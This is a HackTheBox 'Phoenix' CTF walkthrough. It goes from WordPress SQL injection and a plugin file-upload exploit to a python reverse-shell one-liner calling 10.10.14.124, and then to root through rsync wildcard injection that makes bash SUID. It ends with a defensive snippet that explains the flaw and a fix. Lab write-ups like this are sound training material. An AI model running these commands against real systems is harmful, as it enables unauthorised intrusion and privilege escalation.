CTF-Writeups/HackTheBox/Phoenix.md
2022-06-25 20:28:06 +05:00


HackTheBox-Phoenix

NMAP

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http     Apache httpd 
| http-methods:                     
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache          
|_http-title: Did not follow redirect to https://phoenix.htb/       
443/tcp  open  ssl/http Apache httpd         
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: Apache
|_http-title: Did not follow redirect to https://phoenix.htb/
| ssl-cert: Subject: commonName=phoenix.htb/organizationName=Phoenix Security Ltd./stateOrProvinceName=Arizona/countryName=US
| Issuer: commonName=phoenix.htb/organizationName=Phoenix Security Ltd./stateOrProvinceName=Arizona/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-02-15T20:08:43
| Not valid after:  2032-02-13T20:08:43
| MD5:   320f c0ee 2f18 bd78 3abc e9d8 66a6 fc26
|_SHA-1: 6879 3f3b c7d3 a517 6785 bcc7 a726 51ce 8827 4a68
| tls-alpn: 
|_  http/1.1
8888/tcp open  http     SimpleHTTPServer 0.6 (Python 3.8.10)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80/443 (HTTP/HTTPS)

Visiting port 80 redirects us to port 443 on the phoenix.htb domain, so let's add that to the hosts file.

The Wappalyzer extension shows that the site is running the WordPress CMS.

Checking the /wp-admin page, we are presented with a login page that also has a signup option, and we can check out the forums as well.

On the forums we can see 5 users, which could be useful for brute-forcing the login.

Since signup is open, let's try creating a user.

After logging in we can see the WordPress dashboard, but as an unprivileged user we can't see anything other than blog posts.

We can, however, see a plugin named Pie Register.

This plugin had an SQLi vulnerability in two different versions.

There wasn't a PoC for this version, but there was one for the other version.

So to check the version, I ran wpscan to find out the plugin version and to see whether any other plugins were installed.

wpscan --url https://phoenix.htb --disable-tls-checks -e ap -v

This is using 3.7.4.3, which isn't vulnerable, but we do see other plugins. After checking these for vulnerabilities, I found that asgaros-forum had a blind SQLi in versions < 1.15.13, and the version installed on this WordPress was 1.15.12.

Running this payload does indeed work: the page refreshes after 10 seconds. But since it's a blind SQLi it's hard to exploit manually, so I ran sqlmap, which wasn't able to identify the GET parameter as vulnerable.

So I tried again with --level=2 and --risk=2

sqlmap -u "https://phoenix.htb/forum/?subscribe_topic=1" --level=2 --risk=2 --batch

After waiting a while it turns out to be a time-based blind SQLi, so dumping data from the tables is going to take a very long time.

Dumping the whole database was taking way too long.

So we could dump only the table that holds the plugin names. To find out how, I looked it up on Google and found a question on Stack Overflow.

But it would still take a lot of time to dump rows and columns, so on researching wp_options further I learned that we can query the active plugins directly: select option_value from the wp_options table for the row whose option_name is active_plugins.

https://stackoverflow.com/questions/2624551/wordpress-deactivate-a-plugin-via-database

We can provide the SQL query through --sql-query

sqlmap -u "https://phoenix.htb/forum/?subscribe_topic=1" --level=2 --risk=2 --sql-query="SELECT option_value FROM wp_options WHERE option_name = 'active_plugins';" --batch

After letting this query run, it showed four plugins:

  • accordion-slider-gallery
  • adminimize
  • asgaros-forum
  • download-from-files

Foothold

I tried checking exploits for accordion and adminimize, but they were way too old, so I looked up exploits for download-from-files, which had a recent arbitrary file upload vulnerability.

https://www.exploit-db.com/exploits/50287

To exploit this, we need to make a PHP file with the extension .phtml

Running the exploit gives an error about verification of the SSL certificate and fails to make the request, so we need to add verify=False to the GET and POST requests to phoenix.htb

After making those changes it uploads the PHP file.

Using a python3 one-liner to get a reverse shell

python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.124",2222));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

After getting a shell, I stabilized it with stty raw -echo and fg

Being in the WordPress directory, we can read the database password from wp-config.php

But when trying to switch user it asks us for a verification code.

So there's 2FA, but I wasn't able to find any secret with which I could generate the TOTP or OTP, so I decided to look around and found a plugin in the WordPress plugins directory.

Googling this plugin, it seems to be used for SSO (Single Sign-On) across multiple applications.

Using the DB creds we found with mysql, we can log in to the database and view the tables.

Reading the data from wp_usermeta we can find the TOTP key

To use this secret to generate a TOTP we need oathtool

With this we generated a TOTP to use for the verification; I tried it for both users but it failed.

Privilege Escalation (editor)

Searching for where the Google Authenticator configuration lives, it seems there's a PAM module configured for SSH.

https://wiki.archlinux.org/title/Google_Authenticator

From the /etc/pam.d/sshd file we can see that the Google Authenticator module is required for SSH.

Also, looking at /etc/security/access-local.conf, the IP 10.11.12.13 is exempted from the 2FA prompt, as described in the Google Authenticator documentation on the Arch wiki.

After figuring this out, the password still didn't work for these two users, so I checked the database again for password hashes and tried cracking them.

This cracked 3 hashes, so I tried them for the users on the box over SSH, since switching users locally asks for a verification code and we already saw that it won't ask if the connection is coming from 10.11.12.13.

The password superphoenix worked for the editor user.

But running sudo -l asks for the verification code again.

Checking which directories we have write access to

Here we can see a backup of something, created at 3-minute intervals.

Unzipping the archive to see what it's a backup of

This gives a file named dbbackup.sql

It is only backing up the table structure of the wordpress database.

Here I fell into another rabbit hole, a mysqldump CVE from 2016, and again wasted time going down it. After spending hours I tried running pspy, but it wasn't showing processes from any other user.

Running it with -f showed a binary named cron.sh.x being called.

We couldn't see what commands it ran or how, so I ran it as the current user while watching pspy, which showed the commands the binary was running in the background as root:

NOW=$(date +"%Y-%m-%d-%H-%M")
FILE="phoenix.htb.$NOW.tar"
cd /backups
mysqldump -u root wordpress > dbbackup.sql
tar -cf $FILE dbbackup.sql && rm dbbackup.sql
gzip -9 $FILE
find . -type f -mmin +30 -delete
rsync --ignore-existing -t *.* jit@10.11.12.14:/backups/

This explains the mysqldump being created in the /backups folder. To break down this script:

  1. The script first runs the date command and saves the result in the NOW variable
  2. The FILE variable holds the archive name with that timestamp
  3. It switches to the /backups directory
  4. It runs mysqldump to dump the wordpress database into the dbbackup.sql file
  5. It creates a tar archive of dbbackup.sql and then removes the .sql file
  6. It gzips the tar archive
  7. It runs find to delete any file modified more than 30 minutes ago (-mmin +30)
  8. Finally it runs rsync, which transfers files to a remote host. Here it's vulnerable to wildcard injection: the unquoted *.* is expanded by the shell into every matching filename in /backups, so a file whose name starts with - is handed to rsync as an option rather than a path.

Referring to an excellent blog post on wildcard injection, there is a technique for rsync

https://betterprogramming.pub/becoming-root-with-wildcard-injections-on-linux-2dc94032abeb

We can create a bash script with the contents

chmod +s /bin/bash

And create a file whose name will be picked up by rsync as an argument, so that the remote command is executed via our script

touch -- "-e sh script.sh"

Checking the permissions on the bash binary
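As an added illustration (not the box's cron.sh.x and not code from this writeup), the shell snippet below shows why the unquoted *.* in the backup script is a wildcard injection, how to write the line safely, and a quick check a defender can run on a backup directory; the directory and file names it creates are constructed for the demo.

```shell
#!/bin/sh
# Added example, not the box's cron.sh.x: why the unquoted "*.*" in the root
# backup script is a wildcard injection, and how to write that line safely.
# The directory and file names below are constructed for the demo.

# Mimics the vulnerable line. The shell expands the unquoted glob before the
# command runs, so a file named "-something" arrives as an option, not a path.
unsafe_args() {
    ( cd "$1" && printf '%s\n' *.* )
}

# Hardened variant: anchoring the glob with ./ means no expansion can start
# with "-", so rsync can never mistake a filename for an option. The same fix
# applied to the script's rsync line would look like (suggested, not verified
# against the box):
#   rsync --ignore-existing -t -- ./*.* jit@10.11.12.14:/backups/
# where "--" additionally ends option parsing for everything that follows.
safe_args() {
    ( cd "$1" && printf '%s\n' ./*.* )
}

# Detection check for a defender: list any file in a backup directory whose
# name starts with "-". Such a name has no legitimate reason to exist there.
option_like_files() {
    find "$1" -maxdepth 1 -name '-*' -print
}

# Self-contained demo on a temporary directory standing in for /backups.
demo() {
    d=$(mktemp -d)
    touch "$d/phoenix.htb.2022-06-25-20-28.tar.gz" "$d/-x.gz"
    echo "unsafe expansion:";  unsafe_args "$d"
    echo "safe expansion:";    safe_args "$d"
    echo "option-like names:"; option_like_files "$d"
    rm -rf "$d"
}
demo
```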

References